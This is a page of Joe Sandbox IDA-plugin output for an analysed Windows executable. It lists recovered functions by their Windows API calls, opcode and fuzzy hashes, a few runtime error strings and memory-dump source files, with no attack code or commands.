                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 952045576-0
                                                                                                                                                                                                                                                                • Opcode ID: 93a89ff810cfe9e4dbb9530c6e21bfcad32dad85b7d329cf7135e2ac6aefaef2
                                                                                                                                                                                                                                                                • Instruction ID: 6f74209bb422ebd463b90c110a7ff70d944093fd40f6959a18d3bd15cc6144fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a89ff810cfe9e4dbb9530c6e21bfcad32dad85b7d329cf7135e2ac6aefaef2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD418E65C1021865CF51EBB4C88A9CFB7AEAF45710F50856BF518E3622EB34E345C3E9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00702D1B
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00702D23
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00702D2E
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00702D3A
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00702D76
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00702D87
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00705A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00702DC2
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00702DE1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c46a6ed5478c71badfeb5d148e0a94dbef7f655205e1987a8c25bde12ca5f6f
                                                                                                                                                                                                                                                                • Instruction ID: 18cb79cbd0deb4d6c4d8faab1d6acae193abd08c1e2e90dfddf28b907ba514ef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c46a6ed5478c71badfeb5d148e0a94dbef7f655205e1987a8c25bde12ca5f6f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE316D72201214BBEB254F50CC89FEB3BADEB09715F048255FE089A2D1CA799C51C7A4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                • API String ID: 0-572801152
                                                                                                                                                                                                                                                                • Opcode ID: ee36ebaf0493c4c71366a1f70d3bc9747e75f8528cee974beb397e550a244992
                                                                                                                                                                                                                                                                • Instruction ID: 71a0a4d318dd0594008c0298ac2c4c7607c3ed9f5874e6f9424cdcab5b8d76f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee36ebaf0493c4c71366a1f70d3bc9747e75f8528cee974beb397e550a244992
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AD18071A0060AAFDB14DF98C881BFEB7B6BF48344F148169EA16AB281E771DD45CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                • Opcode ID: 29059ced25b887a2041a1d543708f771efd895ffd8a3f10f17ebca42ba6641a4
                                                                                                                                                                                                                                                                • Instruction ID: ccafdae2eaa156d9244f70069079c10319f6425691eccd07fed930571519d92a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29059ced25b887a2041a1d543708f771efd895ffd8a3f10f17ebca42ba6641a4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3919171A00219ABDF24DFA5C884FEF7BBAEF45710F108559F605AB280DB709941CFA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006D000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?,?,006D035E), ref: 006D002B
                                                                                                                                                                                                                                                                  • Part of subcall function 006D000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?), ref: 006D0046
                                                                                                                                                                                                                                                                  • Part of subcall function 006D000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?), ref: 006D0054
                                                                                                                                                                                                                                                                  • Part of subcall function 006D000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?), ref: 006D0064
                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 006F4C51
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006F4D59
                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 006F4DCF
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 006F4DDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                • Opcode ID: bc0f47f79175b9ea75e6bd5d76fc8e258bee3a4f75774733753b778523d4fa87
                                                                                                                                                                                                                                                                • Instruction ID: ab5772f8b430c3d32abf7a4a95d494ba78dbc0cd82398f652e193c267042c56a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc0f47f79175b9ea75e6bd5d76fc8e258bee3a4f75774733753b778523d4fa87
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12912971D0021DEFDF14DFA4C891AEEB7BABF48310F10816AE519A7251EB345A45CFA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00702183
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 007021B5
                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007021DD
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00702213
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 0070224D
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,?), ref: 0070225B
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 006D3A57
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: GetCurrentThreadId.KERNEL32 ref: 006D3A5E
                                                                                                                                                                                                                                                                  • Part of subcall function 006D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006D25B3), ref: 006D3A65
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007022E3
                                                                                                                                                                                                                                                                  • Part of subcall function 006DE97B: Sleep.KERNEL32 ref: 006DE9F3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                • Opcode ID: a03d805c6989f6df60d3bf54ab2be087dffc1de697116ae212cdce579e1523fb
                                                                                                                                                                                                                                                                • Instruction ID: 9c9a81992fed742fddc66f718af10f91ba5d456708ba18accb8b395fc1e3456c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03d805c6989f6df60d3bf54ab2be087dffc1de697116ae212cdce579e1523fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8717376E00205EFCB51DFA4C845AAEB7F5FF48310F158559E816EB392DB38AD428B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 006DAEF9
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 006DAF0E
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 006DAF6F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 006DAF9D
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 006DAFBC
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 006DAFFD
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006DB020
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: 043af0cb1be4700f9fe427f778701e8547483125b6af02a8bf9c2a297f7fabc5
                                                                                                                                                                                                                                                                • Instruction ID: 2b0489891ab7864c9d52ffbce37fd8ca7648c4fd1601cba0003b2506cd738a61
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 043af0cb1be4700f9fe427f778701e8547483125b6af02a8bf9c2a297f7fabc5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51E1A1E083D17DFB3643748845BFBBEAA5B06304F08858AE1D985AC2C399A9C8D751
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 006DAD19
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 006DAD2E
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 006DAD8F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006DADBB
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006DADD8
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006DAE17
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006DAE38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: c54d3b21f73a98c052cdd55a403d0c1d1d514e8f54e158fe3b728a14135bdf79
                                                                                                                                                                                                                                                                • Instruction ID: 218ac6f0fbc4ace1fb4c08258d0be01ac91a568c254b1f1694179c89aa322723
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c54d3b21f73a98c052cdd55a403d0c1d1d514e8f54e158fe3b728a14135bdf79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1651C4B1D087D53DFB3243A48C55BBA7FAB5F46300F08858AE1D546B82C694EC84E766
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006DCF22,?), ref: 006DDDFD
                                                                                                                                                                                                                                                                  • Part of subcall function 006DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006DCF22,?), ref: 006DDE16
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 006DCF45
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 006DCF7F
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006DD005
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006DD01B
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 006DD061
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 92344721878f63803becc69f6bcdaccfc38704fe8057f9680be457b4b9d56be1
                                                                                                                                                                                                                                                                • Instruction ID: 97bdcb6724369ddac1b51a96835b40c2aa56c4e55b4509a83d3e5c7f9c7946f1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92344721878f63803becc69f6bcdaccfc38704fe8057f9680be457b4b9d56be1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A414671D4521D9FDF52EBA4CD81EDDB7BAAF48340F1000EBE505EB241EA34A685CB54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00702E1C
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00702E4F
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00702E84
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00702EB6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00702EE0
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00702EF1
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00702F0B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f9e6a0e6c944f76ce761bca823f7a13b9e8992206747e358760c08bfcb1f029
                                                                                                                                                                                                                                                                • Instruction ID: fdae566cf3ca6a9e678b6a3c1bbfed0c9f183b755405ae6570089816d347c564
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e6a0e6c944f76ce761bca823f7a13b9e8992206747e358760c08bfcb1f029
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E311436684140EFDB219F58DC8CF6537E4EB4A750F1542A5FA048B2F2CB79A8829B04
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 006E04F2
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E052E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                • Opcode ID: 144ea9f116a60e5478c443dea72d9b07f926be5e622533d9e817849a9e51efb5
                                                                                                                                                                                                                                                                • Instruction ID: e14574a9fba22bd092472241783d43391e149fa9a6d9df02a37f0164bc7ac107
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 144ea9f116a60e5478c443dea72d9b07f926be5e622533d9e817849a9e51efb5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D22171B5501345EFEB209F2ADD44A9A77B5BF45724F608A19F8A1D72E0D7B0D980CF20
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 006E05C6
                                                                                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E0601
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                • Opcode ID: 4c93b143a92ec3a732fac788a834d03dba4972aa0c5536c1f4251bd4c4c34d1f
                                                                                                                                                                                                                                                                • Instruction ID: 12b89ac456c36b0bfe59ce2e0efb3d7852655cc4762fb695ec8371236c67dfbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c93b143a92ec3a732fac788a834d03dba4972aa0c5536c1f4251bd4c4c34d1f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21A175501345EBEB208F6A9C04B9A77E5BF85720F204B19F8A1E32E0DBF098A1CB14
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0067600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0067604C
                                                                                                                                                                                                                                                                  • Part of subcall function 0067600E: GetStockObject.GDI32(00000011), ref: 00676060
                                                                                                                                                                                                                                                                  • Part of subcall function 0067600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0067606A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00704112
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0070411F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0070412A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00704139
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00704145
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
